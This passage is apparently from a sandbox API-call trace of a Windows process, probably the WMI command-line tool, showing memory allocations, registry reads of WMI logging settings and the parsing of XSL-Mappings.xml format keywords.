(_Size=0x30) returned 0x168000 [0090.743] malloc (_Size=0x18) returned 0x166e70 [0090.743] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0090.743] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.743] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0090.743] SysStringLen (param_1="PKT") returned 0x3 [0090.743] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0090.743] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.743] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.743] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0090.743] malloc (_Size=0x30) returned 0x168040 [0090.743] malloc (_Size=0x40) returned 0x166e90 [0090.743] malloc (_Size=0x20a) returned 0x166ee0 [0090.743] GetSystemDirectoryW (in: lpBuffer=0x166ee0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.743] free (_Block=0x166ee0) [0090.743] malloc (_Size=0x18) returned 0x166ee0 [0090.743] malloc (_Size=0x18) returned 0x166f00 [0090.743] malloc (_Size=0x18) returned 0x166f20 [0090.743] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0090.743] SysStringLen (param_1="\\wbem\\") returned 0x6 [0090.743] free (_Block=0x166ee0) [0090.743] free (_Block=0x166f00) [0090.743] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0090.743] free (_Block=0x166f20) [0090.743] malloc (_Size=0x18) returned 0x166ee0 [0090.743] malloc (_Size=0x18) returned 0x166f00 [0090.744] malloc (_Size=0x18) returned 0x166f20 [0090.744] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0090.744] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0090.744] free (_Block=0x166ee0) [0090.744] free (_Block=0x166f00) [0090.744] GetCurrentThreadId () returned 0x4fc [0090.744] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef160 | out: phkResult=0x1ef160*=0xf8) returned 0x0 [0090.744] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1ef1b0, lpcbData=0x1ef150*=0x400 | out: lpType=0x0, lpData=0x1ef1b0*=0x30, lpcbData=0x1ef150*=0x4) returned 0x0 [0090.744] _wcsicmp (_String1="0", _String2="1") returned -1 [0090.744] _wcsicmp (_String1="0", _String2="2") returned -2 [0090.744] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1ef150*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1ef150*=0x42) returned 0x0 [0090.744] malloc (_Size=0x86) returned 0x166f40 [0090.744] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x166f40, lpcbData=0x1ef150*=0x42 | out: lpType=0x0, lpData=0x166f40*=0x25, lpcbData=0x1ef150*=0x42) returned 0x0 [0090.744] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0090.744] malloc (_Size=0x42) returned 0x166fd0 [0090.744] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0090.744] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1ef1b0, lpcbData=0x1ef150*=0x400 | out: lpType=0x0, lpData=0x1ef1b0*=0x36, lpcbData=0x1ef150*=0xc) returned 0x0 [0090.744] _wtol (_String="65536") returned 65536 [0090.744] free (_Block=0x166f40) [0090.744] RegCloseKey (hKey=0x0) returned 0x6 [0090.744] CoCreateInstance (in: rclsid=0xffff7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffff73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1ef658 | out: ppv=0x1ef658*=0x1cc71d0) returned 0x0 [0090.910] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1cc71d0, xmlSource=0x1ef7a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x166ee0), isSuccessful=0x1ef810 | out: isSuccessful=0x1ef810*=0xffff) returned 0x0 [0092.158] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1cc71d0, DOMElement=0x1ef650 | out: DOMElement=0x1ef650*=0x1ccbc50) returned 0x0 [0092.159] malloc (_Size=0x18) returned 0x167130 [0092.160] IXMLDOMElement:getElementsByTagName (in: This=0x1ccbc50, tagName="XSLFORMAT", resultList=0x1ef660 | out: resultList=0x1ef660*=0x1cc9cc0) returned 0x0 [0092.163] free (_Block=0x167130) [0092.163] IXMLDOMNodeList:get_length (in: This=0x1cc9cc0, listLength=0x1ef828 | out: listLength=0x1ef828*=21) returned 0x0 [0092.164] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=0, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.165] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.165] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.165] malloc (_Size=0x18) returned 0x167130 [0092.165] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.165] free (_Block=0x167130) [0092.165] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0092.165] malloc (_Size=0x18) returned 0x167130 [0092.165] malloc (_Size=0x18) returned 0x167150 [0092.165] malloc (_Size=0x30) returned 0x168080 [0092.165] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.165] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.165] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.166] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=1, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.166] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="textvaluelist.xsl") returned 0x0 [0092.166] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.166] malloc (_Size=0x18) returned 0x166ee0 [0092.166] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.166] free (_Block=0x166ee0) [0092.166] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0092.166] malloc (_Size=0x18) returned 0x16c560 [0092.166] malloc (_Size=0x18) returned 0x16c580 [0092.166] SysStringLen (param_1="VALUE") returned 0x5 [0092.166] SysStringLen (param_1="TABLE") returned 0x5 [0092.166] SysStringLen (param_1="TABLE") returned 0x5 [0092.166] SysStringLen (param_1="VALUE") returned 0x5 [0092.166] malloc (_Size=0x30) returned 0x1680c0 [0092.166] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.166] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.166] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.166] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=2, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.166] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="textvaluelist.xsl") returned 0x0 [0092.166] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.166] malloc (_Size=0x18) returned 0x16c5a0 [0092.166] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.167] free (_Block=0x16c5a0) [0092.167] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0092.167] malloc (_Size=0x18) returned 0x16c5a0 [0092.167] malloc (_Size=0x18) returned 0x16c5c0 [0092.167] SysStringLen (param_1="LIST") returned 0x4 [0092.167] SysStringLen (param_1="TABLE") returned 0x5 [0092.167] malloc (_Size=0x30) returned 0x168100 [0092.167] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.167] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.167] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.167] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=3, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.167] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="rawxml.xsl") returned 0x0 [0092.167] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.167] malloc (_Size=0x18) returned 0x16c5e0 [0092.167] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.167] free (_Block=0x16c5e0) [0092.167] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0092.167] malloc (_Size=0x18) returned 0x16c5e0 [0092.167] malloc (_Size=0x18) returned 0x16c600 [0092.167] SysStringLen (param_1="RAWXML") returned 0x6 [0092.167] SysStringLen (param_1="TABLE") returned 0x5 [0092.167] SysStringLen (param_1="RAWXML") returned 0x6 [0092.167] SysStringLen (param_1="LIST") returned 0x4 [0092.167] SysStringLen (param_1="LIST") returned 0x4 [0092.167] SysStringLen (param_1="RAWXML") returned 0x6 [0092.167] malloc (_Size=0x30) returned 0x168140 [0092.168] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.168] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.168] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.168] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=4, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.168] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="htable.xsl") returned 0x0 [0092.168] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.168] malloc (_Size=0x18) returned 0x16c620 [0092.168] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.168] free (_Block=0x16c620) [0092.168] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0092.168] malloc (_Size=0x18) returned 0x16c620 [0092.168] malloc (_Size=0x18) returned 0x16c640 [0092.168] SysStringLen (param_1="HTABLE") returned 0x6 [0092.168] SysStringLen (param_1="TABLE") returned 0x5 [0092.168] SysStringLen (param_1="HTABLE") returned 0x6 [0092.168] SysStringLen (param_1="LIST") returned 0x4 [0092.168] malloc (_Size=0x30) returned 0x168180 [0092.168] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.168] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.168] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.168] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=5, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.168] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="hform.xsl") returned 0x0 [0092.168] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.169] malloc (_Size=0x18) returned 0x16c660 [0092.169] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.169] free (_Block=0x16c660) [0092.169] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0092.169] malloc (_Size=0x18) returned 0x16c660 [0092.169] malloc (_Size=0x18) returned 0x16c680 [0092.169] SysStringLen (param_1="HFORM") returned 0x5 [0092.169] SysStringLen (param_1="TABLE") returned 0x5 [0092.169] SysStringLen (param_1="HFORM") returned 0x5 [0092.169] SysStringLen (param_1="LIST") returned 0x4 [0092.169] SysStringLen (param_1="HFORM") returned 0x5 [0092.169] SysStringLen (param_1="HTABLE") returned 0x6 [0092.169] malloc (_Size=0x30) returned 0x1681c0 [0092.169] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.169] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.169] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.169] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=6, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.169] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="xml.xsl") returned 0x0 [0092.169] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.169] malloc (_Size=0x18) returned 0x16c6a0 [0092.169] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.169] free (_Block=0x16c6a0) [0092.169] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0092.169] malloc (_Size=0x18) returned 0x16c6a0 [0092.170] malloc (_Size=0x18) returned 0x16c6c0 [0092.170] SysStringLen (param_1="XML") returned 0x3 [0092.170] SysStringLen (param_1="TABLE") returned 0x5 [0092.170] SysStringLen (param_1="XML") returned 0x3 [0092.170] SysStringLen (param_1="VALUE") returned 0x5 [0092.170] SysStringLen (param_1="VALUE") returned 0x5 [0092.170] SysStringLen (param_1="XML") returned 0x3 [0092.170] malloc (_Size=0x30) returned 0x168200 [0092.170] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.170] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.170] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.170] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=7, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.170] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="mof.xsl") returned 0x0 [0092.170] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.170] malloc (_Size=0x18) returned 0x16c6e0 [0092.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.170] free (_Block=0x16c6e0) [0092.170] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0092.170] malloc (_Size=0x18) returned 0x16c6e0 [0092.170] malloc (_Size=0x18) returned 0x16c700 [0092.170] SysStringLen (param_1="MOF") returned 0x3 [0092.170] SysStringLen (param_1="TABLE") returned 0x5 [0092.170] SysStringLen (param_1="MOF") returned 0x3 [0092.170] SysStringLen (param_1="LIST") returned 0x4 [0092.170] SysStringLen (param_1="MOF") returned 0x3 [0092.170] SysStringLen (param_1="RAWXML") returned 0x6 [0092.170] SysStringLen (param_1="LIST") returned 0x4 [0092.170] SysStringLen (param_1="MOF") returned 0x3 [0092.171] malloc (_Size=0x30) returned 0x168240 [0092.171] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.171] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.171] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.171] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=8, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.171] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="csv.xsl") returned 0x0 [0092.171] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.171] malloc (_Size=0x18) returned 0x16c720 [0092.171] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.171] free (_Block=0x16c720) [0092.171] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0092.171] malloc (_Size=0x18) returned 0x16c720 [0092.171] malloc (_Size=0x18) returned 0x16c740 [0092.171] SysStringLen (param_1="CSV") returned 0x3 [0092.171] SysStringLen (param_1="TABLE") returned 0x5 [0092.171] SysStringLen (param_1="CSV") returned 0x3 [0092.171] SysStringLen (param_1="LIST") returned 0x4 [0092.171] SysStringLen (param_1="CSV") returned 0x3 [0092.171] SysStringLen (param_1="HTABLE") returned 0x6 [0092.171] SysStringLen (param_1="CSV") returned 0x3 [0092.171] SysStringLen (param_1="HFORM") returned 0x5 [0092.171] malloc (_Size=0x30) returned 0x168280 [0092.171] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.171] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.171] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.171] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=9, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.172] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.172] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.172] malloc (_Size=0x18) returned 0x16c760 [0092.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.172] free (_Block=0x16c760) [0092.172] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0092.172] malloc (_Size=0x18) returned 0x16c760 [0092.172] malloc (_Size=0x18) returned 0x16c780 [0092.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.172] SysStringLen (param_1="TABLE") returned 0x5 [0092.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.172] SysStringLen (param_1="VALUE") returned 0x5 [0092.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.172] SysStringLen (param_1="XML") returned 0x3 [0092.172] SysStringLen (param_1="XML") returned 0x3 [0092.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.172] malloc (_Size=0x30) returned 0x1682c0 [0092.172] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.172] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.172] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.172] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=10, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.172] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.172] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.172] malloc (_Size=0x18) returned 0x16c7a0 [0092.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.173] free (_Block=0x16c7a0) [0092.173] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0092.173] malloc (_Size=0x18) returned 0x16c7a0 [0092.173] malloc (_Size=0x18) returned 0x16c7c0 [0092.173] SysStringLen (param_1="texttablewsys") returned 0xd [0092.173] SysStringLen (param_1="TABLE") returned 0x5 [0092.173] SysStringLen (param_1="texttablewsys") returned 0xd [0092.173] SysStringLen (param_1="XML") returned 0x3 [0092.173] SysStringLen (param_1="texttablewsys") returned 0xd [0092.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.173] SysStringLen (param_1="XML") returned 0x3 [0092.173] SysStringLen (param_1="texttablewsys") returned 0xd [0092.173] malloc (_Size=0x30) returned 0x168300 [0092.173] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.173] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.173] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.173] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=11, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.173] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.173] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.173] malloc (_Size=0x18) returned 0x16c7e0 [0092.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.173] free (_Block=0x16c7e0) [0092.173] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0092.173] malloc (_Size=0x18) returned 0x16c7e0 [0092.173] malloc (_Size=0x18) returned 0x16c800 [0092.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.174] SysStringLen (param_1="TABLE") returned 0x5 [0092.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.174] SysStringLen (param_1="XML") returned 0x3 [0092.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.174] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.174] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.174] malloc (_Size=0x30) returned 0x168340 [0092.174] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.174] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.174] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.174] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=12, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.174] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.174] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.174] malloc (_Size=0x18) returned 0x16c820 [0092.174] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.174] free (_Block=0x16c820) [0092.174] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0092.174] malloc (_Size=0x18) returned 0x16c820 [0092.174] malloc (_Size=0x18) returned 0x16c840 [0092.174] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.174] SysStringLen (param_1="TABLE") returned 0x5 [0092.174] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.174] SysStringLen (param_1="XML") returned 0x3 [0092.174] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.174] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.174] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.175] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.175] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0092.175] malloc (_Size=0x30) returned 0x168380 [0092.175] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.175] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.175] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.175] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=13, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.175] IXMLDOMNode:get_text (in: This=0x1ccbd50, text=0x1ef640 | out: text=0x1ef640*="texttable.xsl") returned 0x0 [0092.175] IXMLDOMNode:get_attributes (in: This=0x1ccbd50, attributeMap=0x1ef638 | out: attributeMap=0x1ef638*=0x1cc78d0) returned 0x0 [0092.175] malloc (_Size=0x18) returned 0x16c860 [0092.175] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1cc78d0, name="KEYWORD", namedItem=0x1ef648 | out: namedItem=0x1ef648*=0x1cca280) returned 0x0 [0092.175] free (_Block=0x16c860) [0092.175] IXMLDOMNode:get_nodeValue (in: This=0x1cca280, value=0x1ef680 | out: value=0x1ef680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0092.175] malloc (_Size=0x18) returned 0x16c860 [0092.175] malloc (_Size=0x18) returned 0x16c880 [0092.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.175] SysStringLen (param_1="TABLE") returned 0x5 [0092.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.175] SysStringLen (param_1="XML") returned 0x3 [0092.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.175] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0092.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.175] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.175] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0092.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0092.175] malloc (_Size=0x30) returned 0x1683c0 [0092.175] IUnknown:Release (This=0x1ccbd50) returned 0x0 [0092.176] IUnknown:Release (This=0x1cc78d0) returned 0x0 [0092.176] IUnknown:Release (This=0x1cca280) returned 0x0 [0092.176] IXMLDOMNodeList:get_item (in: This=0x1cc9cc0, index=14, listItem=0x1ef630 | out: listItem=0x1ef630*=0x1ccbd50) returned 0x0 [0092.176] IXMLDOMNode:get_text (in: This=0x1ccbd50, 